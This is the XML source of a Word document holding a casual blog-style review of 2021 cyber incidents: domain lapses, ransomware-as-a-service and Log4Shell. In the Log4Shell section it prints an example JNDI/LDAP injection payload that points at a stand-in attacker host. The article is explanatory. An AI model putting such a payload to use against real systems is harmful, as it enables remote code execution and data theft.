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8AF9" w14:textId="15744BC9" w:rsidR="00012B60" w:rsidRDefault="00012B60" w:rsidP="00012B60">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Most Interesting Cyber Security Incidents of 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3C9C4A" w14:textId="77777777" w:rsidR="00012B60" w:rsidRDefault="00012B60" w:rsidP="00012B60">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D99192" w14:textId="1A668978" w:rsidR="006E447F" w:rsidRDefault="006E447F" w:rsidP="00012B60">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t>2021 has been an interesting year. It felt like a wannabe 2020</w:t>
      </w:r>
      <w:r w:rsidR="00EE0F91">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:commentRangeStart w:id="0"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE0F91">
        <w:t>tbh</w:t>
      </w:r>
      <w:commentRangeEnd w:id="0"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005243EC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0"/>
      </w:r>
      <w:r w:rsidR="00CE0222">
        <w:t>, trying to reiterate the experience from its predecessor</w:t>
      </w:r>
      <w:r w:rsidR="00186E6D">
        <w:t>. U</w:t>
      </w:r>
      <w:r w:rsidR="00333BC5">
        <w:t>ndoubtedly</w:t>
      </w:r>
      <w:r w:rsidR="00186E6D">
        <w:t>, it successfully repeated</w:t>
      </w:r>
      <w:r w:rsidR="00096590">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00EE0F91">
        <w:t>same for</w:t>
      </w:r>
      <w:r w:rsidR="00096590">
        <w:t xml:space="preserve"> cyber security teams </w:t>
      </w:r>
      <w:r w:rsidR="0049772F">
        <w:t>across the industry</w:t>
      </w:r>
      <w:r w:rsidR="00933CA8">
        <w:t xml:space="preserve">. According to a </w:t>
      </w:r>
      <w:r w:rsidR="00D37705">
        <w:t xml:space="preserve">recent </w:t>
      </w:r>
      <w:r w:rsidR="00933CA8">
        <w:t xml:space="preserve">report by </w:t>
      </w:r>
      <w:r w:rsidR="00D37705">
        <w:t xml:space="preserve">Accenture </w:t>
      </w:r>
      <w:r w:rsidR="00C25510">
        <w:t>securit</w:t>
      </w:r>
      <w:r w:rsidR="00E07955">
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="00933CA8">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C25510">
        <w:t>there w</w:t>
      </w:r>
      <w:r w:rsidR="00D37705">
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="00C25510">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD2D51">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00333BC5">
        <w:t xml:space="preserve"> rise of </w:t>
      </w:r>
      <w:r w:rsidR="00B4164D">
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidR="00333BC5">
        <w:t xml:space="preserve">% </w:t>
      </w:r>
      <w:r w:rsidR="0039704D">
        <w:t>in cyber</w:t>
      </w:r>
      <w:r w:rsidR="00741DEE">
        <w:t>secur</w:t>
      </w:r>
      <w:r w:rsidR="0039704D">
        <w:t xml:space="preserve">ity </w:t>
      </w:r>
      <w:r w:rsidR="00BD2D51">
        <w:t xml:space="preserve">incidents </w:t>
      </w:r>
      <w:r w:rsidR="00D37705">
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidR="00BD2D51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F32508">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="00BD2D51">
        <w:t>organization</w:t>
      </w:r>
      <w:r w:rsidR="00D37705">
        <w:t xml:space="preserve"> level</w:t>
      </w:r>
      <w:r w:rsidR="00BD2D51">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00333BC5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFC1A75" w14:textId="7C25A9C9" w:rsidR="00933CA8" w:rsidRDefault="003D40D0" w:rsidP="00012B60">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Here are </w:t>
      </w:r>
      <w:r w:rsidR="005243EC">
        <w:t xml:space="preserve">top </w:t>
      </w:r>
      <w:r w:rsidR="000C4061">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the </w:t>
      </w:r>
      <w:r w:rsidR="006B1656">
        <w:t>fascinating</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C4061">
        <w:t xml:space="preserve">incidents/developments from 2021 which caught my eye </w:t>
      </w:r>
      <w:r w:rsidR="006B1656">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="000C4061">
        <w:t xml:space="preserve">kept me up till </w:t>
      </w:r>
      <w:r w:rsidR="006B1656">
        <w:t>1 am, studying about them!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE81900" w14:textId="77777777" w:rsidR="00F32508" w:rsidRPr="00F32508" w:rsidRDefault="00F32508" w:rsidP="00F3250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Domain Name Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7513F32F" w14:textId="2E89C031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Entrepreneurs of </w:t>
      </w:r>
      <w:r w:rsidR="00626429"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start-ups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 mega-corporations have a lot in hand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, f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rom handling sudden government policy changes to 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ying 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electricity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ills for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ir offices. </w:t>
      </w:r>
      <w:r w:rsidR="00AD29AD"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Amid</w:t>
      </w:r>
      <w:r w:rsidR="006D0261">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidR="007470C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ll</w:t>
      </w:r>
      <w:r w:rsidR="00A81E2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is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ometimes </w:t>
      </w:r>
      <w:r w:rsidR="00C76007">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>tracking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</w:t>
      </w:r>
      <w:r w:rsidR="00052AD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ebsite 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domain and maintaining it may not be at the top of the to-do list. </w:t>
      </w:r>
      <w:r w:rsidR="00C37740">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Sometimes it</w:t>
      </w:r>
      <w:r w:rsidR="00BC269E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00C37740">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="000166CC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hallenging</w:t>
      </w:r>
      <w:r w:rsidR="00D944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even the largest corporations to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keep track of every domain. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196543BE" w14:textId="138C9D7D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A hilarious example of this was when Google Argentina lost its domain </w:t>
      </w:r>
      <w:hyperlink r:id="rId8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www.google.com.ar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="00BC269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hich </w:t>
      </w:r>
      <w:r w:rsidR="00EE198A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>a web developer bought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$2.57</w:t>
      </w:r>
      <w:r w:rsidR="00CA56A3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(</w:t>
      </w:r>
      <w:r w:rsidR="00F14222">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>No million or billion, simple $2.57</w:t>
      </w:r>
      <w:r w:rsidR="00CA56A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>)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. For </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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a brief moment</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F14222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 looked like this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE498A1" w14:textId="77777777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8C032B4" w14:textId="2013F217" w:rsidR="00F32508" w:rsidRPr="00F32508" w:rsidRDefault="00F32508" w:rsidP="00F3250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0BF0323" wp14:editId="368A9AEA">
            <wp:extent cx="5731510" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="254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e smile when you take over Google</w:t>
      </w:r>
      <w:r w:rsidR="00BC269E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>’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s domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1065F18B" w14:textId="50EEAC9B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Google later got the site back</w:t>
      </w:r>
      <w:r w:rsidR="00BD6197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>. E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ven though this dude didn</w:t>
      </w:r>
      <w:r w:rsidR="00BC269E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>’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 </w:t>
      </w:r>
      <w:r w:rsidR="007B1B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>intend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o misbehave, not everyone is an angel. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F02648" w14:textId="68B19A84" w:rsidR="00F32508" w:rsidRP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ere can be several reasons for not maintaining domain names or leaving some domains unsecure. Most commonly</w:t>
      </w:r>
      <w:r w:rsidR="002D0AA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>,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t</w:t>
      </w:r>
      <w:r w:rsidR="00BC269E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>’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s by mistake but can also be due to financial constraints or a company just changing its name</w:t>
      </w:r>
      <w:r w:rsidR="007B1B5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therefore abandoning the</w:t>
      </w:r>
      <w:r w:rsidR="00914155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riginal one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64F96841" w14:textId="2CF92FD3" w:rsidR="00F32508" w:rsidRDefault="00F32508" w:rsidP="00F3250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This can lead to some catastrophic cases of s</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:anchor=":~:text=Social%20engineering%20is%20the%20term,in%20one%20or%20more%20steps.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ocial engineering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like </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:anchor=":~:text=Phishing%20is%20a%20type%20of,instant%20message%2C%20or%20text%20message." w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F32508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en-IN"/>
          </w:rPr>
          <w:t>phishing</w:t>
        </w:r>
      </w:hyperlink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, where malicious actors can pretend to be trustworthy entities</w:t>
      </w:r>
      <w:r w:rsidR="00186E6D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for the unprompted </w:t>
      </w:r>
      <w:r w:rsidRPr="00F32508">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>without any common red flags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA03033" w14:textId="77777777" w:rsidR="00186E6D" w:rsidRDefault="00186E6D" w:rsidP="00186E6D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Ransomware as Service (RaaS) (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>70 million dollar</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> case needs to be investigated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2565DC9C" w14:textId="5E92237B" w:rsidR="00186E6D" w:rsidRDefault="00186E6D" w:rsidP="00186E6D">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A fancy way of hackers going Big Tech. Ransomware as </w:t>
      </w:r>
      <w:r w:rsidR="00E753D3">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Service caught steam in 2020 and got rolling in 2021 with Dark Side, REvil wreaking havoc with incidents like </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Colonial Pipeline</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> or the </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Acer Attacks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2768127B" w14:textId="74BFAD73" w:rsidR="00C9645E" w:rsidRDefault="00C9645E" w:rsidP="00186E6D">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ransomware is malware that, if installed, can lock in all your </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and hold it hostage in exchange for fees, which is generally in cryptocurrency. The most notorious example was the WannaCry breakout in 2017, affecting more than 200,000 windows systems. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B228549" w14:textId="16C70A3F" w:rsidR="00CF01DD" w:rsidRDefault="00C35E7B" w:rsidP="00186E6D">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RaaS is </w:t>
      </w:r>
      <w:r w:rsidR="007F7FF3">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00C84952">
        <w:t>pay</w:t>
      </w:r>
      <w:r w:rsidR="00D445B6">
        <w:t>-as-you-</w:t>
      </w:r>
      <w:r w:rsidR="00C84952">
        <w:t>go service or</w:t>
      </w:r>
      <w:r w:rsidR="00D445B6">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C84952">
        <w:t xml:space="preserve"> in some case</w:t>
      </w:r>
      <w:r w:rsidR="00D445B6">
        <w:t>s,</w:t>
      </w:r>
      <w:r w:rsidR="00C84952">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F2A2E">
        <w:t>subscription service</w:t>
      </w:r>
      <w:r w:rsidR="00CA74A3">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:commentRangeStart w:id="1"/>
      <w:r w:rsidR="00CA74A3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Take that Netflix</w:t>
      </w:r>
      <w:commentRangeEnd w:id="1"/>
      <w:r w:rsidR="00CA74A3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1"/>
      </w:r>
      <w:r w:rsidR="00CA74A3">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="004F2A2E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BB6171">
        <w:t xml:space="preserve">The crooks get access to premium ransomware software developed by top providers and can </w:t>
      </w:r>
      <w:r w:rsidR="00CF01DD">
        <w:t xml:space="preserve">order </w:t>
      </w:r>
      <w:r w:rsidR="00BB6171">
        <w:t>configuration</w:t>
      </w:r>
      <w:r w:rsidR="00CF01DD">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="00BB6171">
        <w:t xml:space="preserve">of the target system </w:t>
      </w:r>
      <w:r w:rsidR="00EE2F7A">
        <w:t>as per their</w:t>
      </w:r>
      <w:r w:rsidR="00BB6171">
        <w:t xml:space="preserve"> liking. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750A2520" w14:textId="7FBDCB97" w:rsidR="005C6F20" w:rsidRDefault="00F803BD" w:rsidP="00186E6D">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In recent times Revil has been the </w:t>
      </w:r>
      <w:r w:rsidR="004B0C01">
        <w:t>most significan</w:t>
      </w:r>
      <w:r>
        <w:t>t cause for concern with damages north of 60 million dollars</w:t>
      </w:r>
      <w:r w:rsidR="00C264DF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00846604">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059237CB" w14:textId="078B135A" w:rsidR="00A87C60" w:rsidRDefault="00186E6D" w:rsidP="00186E6D">
      <w:pPr>
        <w:pStyle w:val="graf"/>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>P.S — It</w:t>
      </w:r>
      <w:r w:rsidR="00BC269E">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">s being reported that the suspects behind REvil are captured, as part of a joint operation between the US and Russia……… </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Emphasis"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Nice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF56163" w14:textId="77777777" w:rsidR="00A87C60" w:rsidRDefault="00A87C60" w:rsidP="00A87C60">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Log4JShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A5FB56" w14:textId="514EC393" w:rsidR="00A87C60" w:rsidRDefault="00A87C60" w:rsidP="00A87C60">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t>2021 needed some form of late hitting for the cybersecurity professionals. It delivered it with a 10 out of 10 score on CVSS (</w:t>
      </w:r>
      <w:r w:rsidRPr="00186E6D">
        <w:t>Common Vulnerability Scoring System</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) with Log4Jshell, </w:t>
      </w:r>
      <w:r w:rsidR="008A7D74">
        <w:t>also</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> touted as the vulnerability of the decade. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63211060" w14:textId="1BD61CD6" w:rsidR="00B8698D" w:rsidRDefault="00A87C60" w:rsidP="00A87C60">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Log4J is a ubiquitous piece of software based on Java and is used to record activities in various kinds of systems. </w:t>
      </w:r>
      <w:r w:rsidR="001A40F3">
        <w:t xml:space="preserve">Think of it like a captain recording everything going on battleship systems. </w:t>
      </w:r>
      <w:r>
        <w:t>The record gives an idea of an application</w:t>
      </w:r>
      <w:r w:rsidR="00BC269E">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s performance while running and alerts of any errors during the execution. </w:t>
      </w:r>
      <w:r w:rsidR="00B8698D">
        <w:t>Services such</w:t>
      </w:r>
      <w:r w:rsidR="00F211A0">
        <w:t xml:space="preserve"> as Amazon Web Services</w:t>
      </w:r>
      <w:r w:rsidR="00131E2E">
        <w:t xml:space="preserve">, Google Ecosystem, and iCloud use </w:t>
      </w:r>
      <w:r w:rsidR="00DB218D">
        <w:t>Log4J extensively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E00AF5A" w14:textId="3E20989F" w:rsidR="00A87C60" w:rsidRDefault="00A87C60" w:rsidP="00A87C60">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerability was introduced in 2013</w:t>
      </w:r>
      <w:r w:rsidR="00DD6E0E">
        <w:t xml:space="preserve"> when</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a contributor allowed developers for custom log message formatting. However</w:t>
      </w:r>
      <w:r w:rsidR="00312A16">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> this feature could also compromise the servers if it was allowed to follow nefarious links stated in </w:t>
      </w:r>
      <w:r w:rsidR="00312A16">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">logging code. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B53DCCD" w14:textId="63C30839" w:rsidR="00A87C60" w:rsidRDefault="00A87C60" w:rsidP="00A87C60">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An example of </w:t>
      </w:r>
      <w:r w:rsidR="00312A16">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attack can be this </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4A546C" w14:textId="77777777" w:rsidR="00A87C60" w:rsidRDefault="00A87C60" w:rsidP="00A87C60">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F7F8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F7F8"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F7F8"/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F7F8"/>
        </w:rPr>
        <w:t>://some-attacker.com/a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F7F8"/>
        </w:rPr>
        <w:t>}   This line in the log is enough to compromise your personal data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D95BD06" w14:textId="23CC0731" w:rsidR="00A87C60" w:rsidRDefault="00A02F90" w:rsidP="00A87C60">
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="003C51BB">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00A87C60">
        <w:t xml:space="preserve"> line </w:t>
      </w:r>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00A87C60">
        <w:t xml:space="preserve"> code in any compromised website</w:t>
      </w:r>
      <w:r w:rsidR="00B77C6E">
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="00A87C60">
        <w:t xml:space="preserve"> search box could cause servers to</w:t>
      </w:r>
      <w:r w:rsidR="00FC031E">
        <w:t xml:space="preserve"> be</w:t>
      </w:r>
      <w:r w:rsidR="00A87C60">
        <w:t xml:space="preserve"> remote</w:t>
      </w:r>
      <w:r w:rsidR="00FC031E">
        <w:t>ly</w:t>
      </w:r>
      <w:r w:rsidR="00A87C60">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC031E">
        <w:t>controlled</w:t>
      </w:r>
      <w:r w:rsidR="00A87C60">
        <w:t xml:space="preserve"> and possibly compromise personal data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA45B64" w14:textId="0A944B77" w:rsidR="00557763" w:rsidRDefault="00A87C60" w:rsidP="00A87C60">
      <w:r>
        <w:t>The latest release of the Log4J patches the vulne</w:t>
      </w:r>
      <w:r w:rsidR="008175EF">
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ability. However, for various organizations, it is still under process. At an individual level, we can only hope that our services are defended from this vulnerability. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2494BF38" w14:textId="06F1D1D0" w:rsidR="00557763" w:rsidRDefault="00557763" w:rsidP="00A87C60">
      <w:r>
        <w:t xml:space="preserve">These are the Top 3 </w:t>
      </w:r>
      <w:r w:rsidR="00646AAD">
        <w:t xml:space="preserve">interesting cybersecurity </w:t>
      </w:r>
      <w:r w:rsidR="00311AFD">
        <w:t xml:space="preserve">incidents of 2021. </w:t>
      </w:r>
      <w:r w:rsidR="008175EF">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00311AFD">
        <w:t xml:space="preserve">ope you guys stay safe from nefarious internet trolls and </w:t>
      </w:r>
      <w:r w:rsidR="008175EF">
        <w:t>data abusers! Till then!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3DBFD7" w14:textId="77777777" w:rsidR="00A87C60" w:rsidRPr="00A87C60" w:rsidRDefault="00A87C60" w:rsidP="00186E6D">
      <w:pPr>
        <w:pStyle w:val="graf"/>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20930A2E" w14:textId="43FA4C3F" w:rsidR="000E3E5C" w:rsidRDefault="000E3E5C" w:rsidP="00186E6D">
      <w:pPr>
        <w:pStyle w:val="graf"/>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
